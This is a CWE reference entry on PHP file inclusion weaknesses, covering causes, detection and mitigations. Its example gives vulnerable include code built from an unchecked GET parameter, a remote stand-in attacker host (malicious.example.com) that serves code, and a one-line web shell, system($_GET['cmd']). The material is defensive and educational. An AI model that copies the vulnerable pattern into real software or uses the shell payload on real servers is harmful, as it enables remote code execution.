CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
Weakness ID: 98 (Weakness Base)
Status: Draft
Description
Description Summary
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
Extended Description
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Alternate Terms
PHP remote file inclusion
Local file inclusion:
This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker's control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs.
Time of Introduction
Implementation
Architecture and Design
Applicable Platforms
Languages
PHP: (Often)
Common Consequences
Scope
Effect
Integrity
Confidentiality
Availability
Technical Impact: Execute unauthorized code or
commands
The attacker may be able to specify arbitrary code to be executed from
a remote location. Alternatively, it may be possible to use normal
program behavior to insert php code into files on the local machine
which can then be included and force the code to execute since php
ignores everything in the file except for the content between php
specifiers.
Likelihood of Exploit
High to Very High
Detection Methods
Manual Analysis
Manual white-box analysis can be very effective for finding this
issue, since there is typically a relatively small number of include or
require statements in each program.
Effectiveness: High
Automated Static Analysis
The external control or influence of filenames can often be detected
using automated static analysis that models data flow within the
software.
Automated static analysis might not be able to recognize when proper
input validation is being performed, leading to false positives - i.e.,
warnings that do not have any security consequences or require any code
changes. If the program uses a customized input validation library, then
some tools may allow the analyst to create custom signatures to detect
usage of those routines.
Demonstrative Examples
Example 1
The following code attempts to include a function contained in a
separate PHP page on the server. It builds the path to the file by using the
supplied 'module_name' parameter and appending the string '/function.php' to
it.
victim.php
(Bad Code)
Example
Language: PHP
$dir = $_GET['module_name'];
include($dir . "/function.php");
The problem with the above code is that the value of $dir is not
restricted in any way, and a malicious user could manipulate the
'module_name' parameter to force inclusion of an unanticipated file. For
example, an attacker could request the above PHP page (example.php) with
a 'module_name' of "http://malicious.example.com" by using the following
request string:
Upon receiving this request, the code would set 'module_name' to the
value "http://malicious.example.com" and would attempt to include
http://malicious.example.com/function.php, along with any malicious code
it contains.
For the sake of this example, assume that the malicious version of
function.php looks like the following:
(Bad Code)
system($_GET['cmd']);
An attacker could now go a step further in our example and provide a
request string as follows:
The code will attempt to include the malicious function.php file from
the remote site. In turn, this file executes the command specified in
the 'cmd' parameter from the query string. The end result is an attempt
by tvictim.php to execute the potentially malicious command, in this
case:
(Attack)
/bin/ls -l
Note that the above PHP example can be mitigated by setting
allow_url_fopen to false, although this will not fully protect the code.
See potential mitigations.
PHP file inclusion issue, both remote and local;
local include uses ".." and "%00" characters as a manipulation, but many
remote file inclusion issues probably have this
vector.
Potential Mitigations
Phase: Architecture and Design
Strategy: Libraries or Frameworks
Use a vetted library or framework that does not allow this weakness to
occur or provides constructs that make this weakness easier to
avoid.
Phase: Architecture and Design
Strategy: Enforcement by Conversion
When the set of acceptable objects, such as filenames or URLs, is
limited or known, create a mapping from a set of fixed input values
(such as numeric IDs) to the actual filenames or URLs, and reject all
other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to
"profile.txt". Features such as the ESAPI AccessReferenceMap provide
this capability.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Phases: Architecture and Design; Operation
Strategy: Sandbox or Jail
Run your code in a "jail" or similar sandbox environment that enforces
strict boundaries between the process and the operating system. This may
effectively restrict which files can be accessed in a particular
directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux.
In general, managed code may provide some protection. For example,
java.io.FilePermission in the Java SecurityManager allows you to specify
restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to
the operating system; the rest of your application may still be subject
to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
Effectiveness: Limited
The effectiveness of this mitigation depends on the prevention
capabilities of the specific sandbox or jail being used and might only
help to reduce the scope of an attack, such as restricting the attacker
to certain system calls or limiting the portion of the file system that
can be accessed.
Phases: Architecture and Design; Operation
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to
accomplish the necessary tasks. If possible, create isolated accounts
with limited privileges that are only used for a single task. That way,
a successful attack will not immediately give the attacker access to the
rest of the software or its environment. For example, database
applications rarely need to run as the database administrator,
especially in day-to-day operations.
Phase: Implementation
Strategy: Input Validation
Assume all input is malicious. Use an "accept known good" input
validation strategy, i.e., use a whitelist of acceptable inputs that
strictly conform to specifications. Reject any input that does not
strictly conform to specifications, or transform it into something that
does. Do not rely exclusively on looking for malicious or malformed
inputs (i.e., do not rely on a blacklist). However, blacklists can be
useful for detecting potential attacks or determining which inputs are
so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant
properties, including length, type of input, the full range of
acceptable values, missing or extra inputs, syntax, consistency across
related fields, and conformance to business rules. As an example of
business rule logic, "boat" may be syntactically valid because it only
contains alphanumeric characters, but it is not valid if you are
expecting colors such as "red" or "blue."
For filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.
Phases: Architecture and Design; Operation
Strategy: Identify and Reduce Attack Surface
Store library, include, and utility files outside of the web document
root, if possible. Otherwise, store them in a separate directory and use
the web server's access control capabilities to prevent attackers from
directly requesting them. One common practice is to define a fixed
constant in each calling program, then check for the existence of the
constant in the library/include file; if the constant does not exist,
then the file was directly requested, and it can exit
immediately.
This significantly reduces the chance of an attacker being able to
bypass any protection mechanisms that are in the base program but not in
the include files. It will also reduce your attack surface.
Phases: Architecture and Design; Implementation
Strategy: Identify and Reduce Attack Surface
Understand all the potential areas where untrusted inputs can enter
your software: parameters or arguments, cookies, anything read from the
network, environment variables, reverse DNS lookups, query results,
request headers, URL components, e-mail, files, filenames, databases,
and any external systems that provide data to the application. Remember
that such inputs may be obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that
certain inputs could not be modified, especially for cookies and URL
components.
Phase: Operation
Strategy: Firewall
Use an application firewall that can detect attacks against this
weakness. It can be beneficial in cases in which the code cannot be
fixed (because it is controlled by a third party), as an emergency
prevention measure while more comprehensive software assurance measures
are applied, or to provide defense in depth.
Effectiveness: Moderate
An application firewall might not cover all possible input vectors. In
addition, attack techniques might be available to bypass the protection
mechanism, such as using malformed inputs that can still be processed by
the component that receives those inputs. Depending on functionality, an
application firewall might inadvertently reject or modify legitimate
requests. Finally, some manual effort may be required for
customization.
Phases: Operation; Implementation
Strategy: Environment Hardening
Develop and run your code in the most recent versions of PHP
available, preferably PHP 6 or later. Many of the highly risky features
in earlier PHP interpreters have been removed, restricted, or disabled
by default.
Phases: Operation; Implementation
Strategy: Environment Hardening
If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
Often, programmers do not protect direct access to files intended only
to be included by core programs. These include files may assume that
critical variables have already been initialized by the calling program.
As a result, the use of register_globals combined with the ability to
directly access the include file may allow attackers to conduct file
inclusion attacks. This remains an extremely common pattern as of
2009.
Phase: Operation
Strategy: Environment Hardening
Set allow_url_fopen to false, which limits the ability to include
files from remote locations.
Effectiveness: High
Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion.
This is frequently a functional consequence of other weaknesses. It is
usually multi-factor with other factors (e.g. MAID), although not all
inclusion bugs involve assumed-immutable data. Direct request weaknesses
frequently play a role.
Can overlap directory traversal in local inclusion problems.
Research Gaps
Under-researched and under-reported. Other interpreted languages with
"require" and "include" functionality could also product vulnerable
applications, but as of 2007, PHP has been the focus. Any web-accessible
language that uses executable file extensions is likely to have this type of
issue, such as ASP, since .asp extensions are typically executable.
Languages such as Perl are less likely to exhibit these problems because the
.pl extension isn't always configured to be executable by the web
server.